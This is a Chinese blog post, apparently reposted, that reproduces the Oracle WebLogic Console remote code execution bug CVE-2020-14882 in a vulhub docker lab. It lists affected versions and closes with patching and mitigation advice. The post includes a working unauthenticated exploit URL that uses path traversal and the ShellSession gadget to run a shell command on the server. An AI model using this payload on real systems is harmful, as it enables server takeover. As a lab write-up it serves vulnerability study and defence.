标签:WeblogicServer Console 14882 补丁 漏洞 代码执行 Oracle console 复现
目录
一 、漏洞描述
WebLogic远程代码执行漏洞(漏洞编号:CVE-2020-14882)的补丁存在绕过风险,远程攻击者可以构造特殊的 HTTP 请求,在未经身份验证的情况下接管 WebLogic Server Console ,并在 WebLogic ServerConsole 执行任意代码。
二 、影响版本
Oracle WeblogicServer 10.3.6.0.0
Oracle WeblogicServer 12.1.3.0.0
Oracle WeblogicServer 12.2.1.3.0
Oracle WeblogicServer 12.2.1.4.0
Oracle WeblogicServer 14.1.1.0.0
三 、漏洞利用
环境搭建
操作系统:Ubuntu 20.04.2 LTS
此处利用vulhub的环境进行复现,开启docker-compose环境:docker-compose up -d
漏洞复现
1. 访问漏洞环境:http://your-ip:7001/console/login/LoginForm.jsp
2. 根据不同需求进行Pyload构造。此处是通过在/tmp目录创建111.txt进行验证:
执行Pyload:
http://your-ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27touch%20/tmp/111.txt%27);%22)
3. 复现成功,效果如下:
四 、漏洞修复
目前 Oracle 官方已发布了最新针对该漏洞的补丁,请受影响用户及时下载补丁程序并安装更新。Oracle 官方补丁需要用户持有正版软件的许可账号,使用该账号登陆 https://support.oracle.com 后,可以下载最新补丁。
临时修补建议
暂时对外关闭后台 /console/console.portal 的访问权限。
标签:WeblogicServer,Console,14882,补丁,漏洞,代码执行,Oracle,console,复现 来源: https://blog.csdn.net/weixin_42181573/article/details/117526222
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。